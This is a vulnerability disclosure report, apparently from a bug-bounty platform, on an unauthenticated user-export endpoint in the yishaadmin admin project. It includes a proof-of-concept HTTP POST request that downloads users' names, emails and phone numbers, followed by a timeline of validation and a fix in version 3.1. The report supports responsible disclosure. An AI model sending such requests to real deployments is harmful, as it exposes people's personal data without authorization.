Improper Authentication in liukuo362573/yishaadmin


Reported on

Jan 24th 2022


Hi, I would like to report an improper authentication vulnerability in Endpoint "/admin/OrganizationManage/User/ExportUserJson" does not require any authentication and return xls file contain users data like username, fullname, email, phone.

Proof of Concept

  • Step 1: using BurpSuite and call this request
POST /admin/OrganizationManage/User/ExportUserJson HTTP/1.1
Content-Length: 65
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

  • Step 2: Get Data in response and go to "" + Data to download all users data. Example:


Unauthenticated user can get the data off all users in application.

We are processing your report and will contact the liukuo362573/yishaadmin team within 24 hours. a year ago
We have contacted a member of the liukuo362573/yishaadmin team and are waiting to hear back a year ago
We have sent a follow up to the liukuo362573/yishaadmin team. We will try again in 7 days. a year ago
We have sent a second follow up to the liukuo362573/yishaadmin team. We will try again in 10 days. a year ago
liukuo362573 validated this vulnerability a year ago
nhiephon has been awarded the disclosure bounty
The fix bounty is now up for grabs
liukuo362573 marked this as fixed in 3.1 with commit 05f615 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation